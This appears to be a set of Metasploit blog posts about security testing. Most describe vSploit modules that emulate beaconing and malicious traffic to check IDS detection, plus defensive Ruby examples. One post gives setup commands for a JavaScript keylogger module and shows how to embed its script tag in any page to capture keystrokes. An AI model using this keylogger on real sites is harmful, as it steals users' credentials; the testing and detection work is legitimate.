10 Posts authored by: mjc

Looks like there is another hacker movie coming out soon called "Reboot", as seen in the trailer and screen shots below. It's always cool to see Metasploit appear in movie and TV productions. If anyone out there has seen a screening of the film, let us know.


See Trailer -> Reboot Trailer - YouTube


Here are a couple of screen captures from the trailer with Metasploit cameos:




Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don't understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in its databases. An attacker only needs to insert some evil code and let it do the work for them.


This is one of the many reasons the Internet is like a minefield, with malicious code around every turn. If an attacker can insert code on a website, they don't need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker's perspective: they can sit back and watch credentials magically appear. It reminds me of fishermen's tales of fish jumping into their boats.


In the information security field, Metasploit is the ultimate "I can show you better than I can tell you!" software. Security professionals need to be able to demonstrate exploitation techniques to users and management. I have seen JavaScript keyloggers out there in the wild, but couldn't find a scalable, easy-to-deploy version.


So I sat down a couple of weeks ago and wrote a Metasploit-based JavaScript keylogger from scratch. I have to give props to Wei, Tod, and HD for motivation and help with fine-tuning the module. Adding exploitation techniques to Metasploit solves any scalability and deployability issues. James "@egyp7" Lee presented a talk at the last BSides Las Vegas on why it makes sense to develop these types of tools using Metasploit. The reason is that Metasploit has tons of code you can reuse to build anything, almost like Lego blocks.


The Metasploit JavaScript Keylogger sets up an HTTP/HTTPS listener which serves the JavaScript keylogger code and captures the keystrokes over the network. I've included a demo page within the module for testing purposes. Just enter "set DEMO true" during module setup, as you can see below, to activate the demo page. To access the demo page, just append "/demo" to the URL provided.


Of course, the keylogger captures all keystrokes entered on the webpage, including tabs, carriage returns, and backspaces, once the JavaScript <script> tag is embedded in the page.


Step 1: Module setup:


msf > use auxiliary/server/capture/http_javascript_keylogger 
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options

Module options (auxiliary/server/capture/http_javascript_keylogger):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DEMO        true             yes       Creates HTML for demo purposes
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(http_javascript_keylogger) > run

[*] Using URL:
[*]  Local IP:
[*] Server started.


Step 2: Demo page URL


Step 3 (Optional): To embed the keylogger into any webpage, place a reachable URL, with "/[whatever].js" appended, in an HTML <script> tag:


<script type="text/javascript" src=""></script>


Screen Capture 1: Module setup and run


Screen Capture 2: Demo page


Screen Capture 3: Keystrokes captured and stored to loot


As always, hack responsibly. Let me know if you have any questions in the comments.


If you haven't looked at Metasploit Community Edition, you should definitely give it a try.


You can also hit me on Twitter @threatagent.

Yesterday I asked a question on Twitter and got a lot of responses from the security community.


I was finishing up a Metasploit module that I was coding last weekend. I posed the challenge to myself of scanning for egress ports while not actually inside a network. I accomplished this by setting up multiple listeners and embedding HTML <img> tags in a webpage. This can easily be done with Metasploit Framework. I created a report page and a stealth page with no images. Metasploit keeps track of the connections on the attacker side as well. I also wanted to do this module without JavaScript because browsers are getting smarter about JavaScript doing weird things. Also, I have some ports in here (23, 25, etc.) that are blocked by some browsers, but you never know, so I included them as well.



You can download the module from my GitHub, or wait for it to appear in the Metasploit trunk. In the meantime, if you have a question about it, please leave a comment below.





Many security researchers use the Metasploit Framework for security proofs of concept and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit's Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone's file system and downloads files to his local computer. Charlie found a flaw that allowed him to bypass Apple's code signing requirements and run arbitrary code on the iPhone.



I created a couple of new vSploit modules to allow organizations to test their ability to detect APT-type activity. There are already a few vSploit modules in the Metasploit trunk, and you should see several more modules added next year. I will keep coding vSploit modules in my spare time to fill critical needs when I see them. I have created a new DNS beaconing module and a filestream module and posted them to my GitHub account (links below).



There have been two really good sources of information recently on malicious domain names. If you didn't get a chance to check the following two links out, they are must-reads:


I grabbed all of the domains, sorted them, eliminated duplicates, and threw them into a vSploit module.

This module is available for download at my GitHub account:


I believe it is essential that organizations, especially DoD and .gov agencies, are able to detect suspicious domains like the following. The process is simple: 1) run the vSploit module; 2) is your DNS logging/monitoring picking up this activity?


If you can't see the activity you need to put something in place to make that happen.


vSploit filestream


If you are familiar with what's going on with current attacks, you may know that attackers tend to compress files, e.g. into encrypted RAR files, and exfiltrate them. Many times attackers are able to send these in plain text over networks without detection. I don't know too many places, especially government-related ones, that run RAR software on their network. I could be totally wrong on that point, but I haven't seen it. The filestream module sends data streams that emulate malicious files by sending a matching file header followed by hex padding.


The module currently sends filestreams emulating EXE (Windows executables), ZIP (ZIP archives), RAR (RAR archives), and ELF (Linux/UNIX executables). This module works over TCP/UDP and requires a listener port. Although these file types may be common in some environments, there are definitely cases where they shouldn't be traversing networks. Regardless, organizations should be able to see this activity.
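An added example, not the vSploit module's own code, of what a header-plus-padding filestream looks like for the four types above and how a sensor would recognize one: it classifies payloads by their leading magic bytes. The padding byte, the sample connections and the ordinary HTTP request are constructed assumptions.

```ruby
# Leading signatures of the four file types the filestream module emulates.
MAGIC = {
  exe: "MZ".b,                # Windows PE/DOS executable
  zip: "PK\x03\x04".b,        # ZIP local file header
  rar: "Rar!\x1A\x07\x00".b,  # RAR 1.5 - 4.x archive signature
  elf: "\x7FELF".b,           # ELF executable
}.freeze

# Emulated stream: the file type's magic header followed by padding. The
# padding byte (0x41) is a constructed choice, an assumption about the
# module's "hex padding", not the module's actual output.
def emulated_stream(type, total_len = 64)
  header = MAGIC.fetch(type)
  raise ArgumentError, 'total_len too small' if total_len < header.bytesize
  header + ("\x41".b * (total_len - header.bytesize))
end

# Classify the first bytes of a TCP/UDP payload. Returns the matching file
# type symbol, or nil when no known signature is present. Longer signatures
# are tried first so a short prefix can never shadow a longer match.
def classify_stream(payload)
  payload = payload.b
  MAGIC.sort_by { |_, sig| -sig.bytesize }.each do |type, sig|
    return type if payload.start_with?(sig)
  end
  nil
end

# Walk captured payloads (label => bytes) and return only those carrying a
# file signature, so a sensor rule can be checked against the same inputs.
def flag_payloads(payloads)
  payloads.each_with_object({}) do |(label, bytes), hits|
    type = classify_stream(bytes)
    hits[label] = type if type
  end
end

if __FILE__ == $0
  # Constructed sample: two emulated filestreams and one ordinary HTTP request.
  samples = {
    '10.0.0.5:49152 -> 203.0.113.9:443'  => emulated_stream(:rar),
    '10.0.0.5:49153 -> 203.0.113.9:8080' => "GET / HTTP/1.1\r\n".b,
    '10.0.0.7:51000 -> 198.51.100.2:53'  => emulated_stream(:elf, 32),
  }
  flag_payloads(samples).each { |conn, type| puts "#{conn}: #{type.to_s.upcase} header" }
end
```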


GitHub link:


Wireshark capture of RAR filestream:




These modules can definitely help some environments. As always, I'd love your feedback. Please leave a comment below.

While browsing security-related articles at CNN, I noticed this video of Eric Fiterman demonstrating a phishing attack and some post-exploitation techniques with Metasploit Framework.



Video courtesy of:

One of my key objectives for developing the new vSploit modules was to test network sensors such as Snort. Snort and Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de facto standard when it comes to intrusion detection systems (IDS), so much so that even third-party intrusion detection systems often import Snort rules.


Organizations often have a tough time verifying that their IDS deployments actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.


However, not every rule is used in every environment. For example, if you aren't using Microsoft FrontPage on your network, you likely won't want to use Snort's FrontPage rules. On the other hand, if you are running FrontPage, you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.


You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, provided there is end-to-end network connectivity to the vSploit instances:






To try out the new vSploit modules, start up the vSploit Generic HTTP Server.



Then launch the FrontPage-related attack attributes:




Verify that the packets are being transmitted in Wireshark:




Finally, verify that Snort IDS sees the activity:




Metasploit vSploit Modules will be released at DEFCON 19.


[*UPDATE 6/28/2011*] vSploit Modules will be released at DEFCON


This is a follow-up post to vSploit - Virtualizing Intrusion & Exploitation Attributes with Metasploit Framework about using Metasploit as a way to test network infrastructure countermeasures and coverage. I mentioned obtaining a list of suspicious domains to use for testing an organization's network intelligence. Simply put, let's create suspicious traffic to see how organizations respond.


In that post and accompanying video, I used the Metasploit vSploit DNS Beaconing module to emulate suspicious DNS traffic. One response I received was, "Where can I get a list of suspicious domains?" Generally, the best place is probably the SANS Institute Suspicious Domains page.


However, in this post I'll concentrate on the ZeuS Tracker, which has lists of suspicious IP addresses and domain names. Of the offered blocklists, we'll be using the ZeuS domain list, which we can use as input for the Metasploit vSploit DNS Beaconing module. Download this list, remove comments and whitespace, then save it as a text file. At the time of this post the list contained 651 suspicious domains, a number which of course changes from time to time.


First, confirm that the suspicious domain list is in place:




After starting up Metasploit, enter "use auxiliary/vsploit/dns/dns_beacon" and then "set DOMAINS file:/tmp/domains.txt":




Now type "run" to start the queries:




This is great to test your ability to monitor suspicious domain queries in your organization, without actually infecting real hosts.
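The defender's half of this exercise, as an added example that is not part of the original post or the vSploit module: parse a downloaded domain list the way the post describes (drop comments and whitespace), then check DNS query log lines against it, which is also the "is your DNS logging/monitoring picking up this activity?" question from the DNS beaconing post above. The log line layout and every domain below are constructed assumptions, not entries from the real list.

```ruby
require 'set'

# Constructed blocklist text laid out like a downloaded tracker list: "#" comments,
# blank lines and stray whitespace. The domains are placeholders, not real entries.
BLOCKLIST_TEXT = <<~LIST
  # domain blocklist (constructed sample)
  bad-example.test
    evil-cdn.example   
  # trailing comment

  beacon-host.invalid
LIST

# The "remove comments and whitespace" step: returns a Set of lowercase domains.
def parse_blocklist(text)
  text.each_line.map { |l| l.sub(/#.*/, '').strip.downcase }.reject(&:empty?).to_set
end

# True when qname is a blocklisted domain or a subdomain of one (trailing dot tolerated).
def suspicious?(qname, blocklist)
  labels = qname.downcase.chomp('.').split('.')
  (0...labels.size).any? { |i| blocklist.include?(labels[i..-1].join('.')) }
end

# Constructed log layout (an assumption, not a particular resolver's format):
#   "<timestamp> client <ip> query <qname> <qtype>"
LOG_RE = /\A\S+\s+client\s+(\S+)\s+query\s+(\S+)\s+(\S+)/

# Returns [client_ip, qname] pairs for queries that hit the blocklist, i.e. what
# DNS monitoring should surface while the beacon module is running.
def find_beacons(log_lines, blocklist)
  hits = []
  log_lines.each do |line|
    m = LOG_RE.match(line)
    next unless m
    hits << [m[1], m[2]] if suspicious?(m[2], blocklist)
  end
  hits
end

if __FILE__ == $0
  list = parse_blocklist(BLOCKLIST_TEXT)
  logs = [ # constructed sample log lines
    '2011-07-10T12:00:01Z client 10.0.0.5 query www.example.com A',
    '2011-07-10T12:00:02Z client 10.0.0.5 query cfg.bad-example.test A',
    '2011-07-10T12:00:03Z client 10.0.0.9 query beacon-host.invalid. TXT',
  ]
  find_beacons(logs, list).each { |ip, q| puts "#{ip} queried #{q}" }
end
```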


If you'd like to learn more about the new vSploit modules to test your network security infrastructure, join me in tomorrow's webinar Identifying Infrastructure Blindspots with Metasploit Framework for a live demo.


Many organizations are making significant investments in technologies in order to tell if they have been compromised; however, frequently they find out when it is too late. There are several network-based attributes that, when combined, indicate possible compromises have taken place. Many pentesters are successful at compromising hosts; however, they are commonly restricted in what they can and can't do. There needs to be a way that they can successfully mimic threats and scenarios, even when restricted: a way that pentesters and defenders can test organizational awareness without just "popping shells". Currently you'd have to drop live malware on networks to show customers whether their countermeasures can detect the activity, which is not feasible.


As such, there is a need for people to test their ability to find compromised hosts without spreading live malware on their network or needing an expensive stand-alone lab. Are their countermeasures configured correctly? Is traffic bypassing their countermeasures? Can they spot a compromised host doing the bidding of an attacker? Basically, can organizations spot a wolf in sheep's clothing?


Over the last few years I've done tons of research on intrusion attributes and have deployed an alphabet soup of security solutions. To tackle the inability to do testing of these systems, I started to write my own framework in Python, mimicking malicious activities. Now that I've joined Rapid7, I've been talking with HD Moore about incorporating the concept into the Metasploit Framework and so I've dusted off my Ruby skills and started dabbling with developing Metasploit Auxiliary modules. After a few days I have some cool things working.



I'm dubbing the new auxiliary modules vSploit modules. The name vSploit was chosen because what we are doing is virtualizing exploitation attributes. vSploit modules imitate compromised or vulnerable hosts on networks. They are created to give enterprises a chance to test their overall security architecture and design. In my experience, people deploy a whole host of systems such as IDS/IPS, log correlation solutions, firewalls, proxies, you name it, but many times these products are not seeing the low-hanging fruit that is indicative of breaches. vSploit modules are a way to test these solutions without actually releasing live exploits on your network. I'm working on Metasploit resource files to launch virtual intrusion scenarios.


I will be doing a webinar introducing the concept on June 14th, 2011 at 2pm EST: Identifying Infrastructure Blindspots with Metasploit Framework. In the talk I'll cover how to use vSploit modules to validate whether security solutions are working as expected. I hope you can join, because I'm looking forward to your feedback.


Here is a quick demonstration of a few vSploit Modules:


vSploit Web PII Module



vSploit DNS Beacon Module


Originally posted by HD Moore:


We are happy to announce the immediate availability of version 3.7.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro. This is a relatively small release focused on bug fixes and performance improvements.


Notable highlights include an improved IPv6 reverse_tcp stager from Stephen Fewer, a performance improvement for HTTP services (client-side modules), a bug fix to channel support in the PHP Meterpreter, an update to MSFGUI, and various small tweaks to the included modules. In addition, this release adds exploit modules for the VLC Media Player and the ICONICS WebHMI ActiveX control (SCADA), as well as a new ARP Poisoning auxiliary module.


More details about the open source release can be found in the 3.7.1 Release Notes. As always, the latest version is available from the Metasploit download page.


Metasploit Express and Metasploit Pro users will note an immediate performance improvement to the user interface as well as minor bug fixes to the Exploits and Vulnerabilities Live Report. Applying the latest software update from the Administration menu will apply the 3.7.1 upgrade. The full release notes can be found online at 3.7.1 Release Notes.
